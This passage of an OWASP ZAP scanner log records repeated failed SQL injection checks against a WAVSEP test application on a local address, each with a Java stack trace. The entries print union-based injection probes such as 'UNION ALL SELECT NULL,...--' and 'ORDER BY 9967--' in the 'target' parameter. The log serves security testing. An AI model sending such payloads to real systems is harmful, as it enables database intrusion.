org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682521 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682522 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682524 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682525 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 9967-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 9967-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682525 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682526 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682527 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682528 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682529 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682529 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682530 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682531 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682532 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at 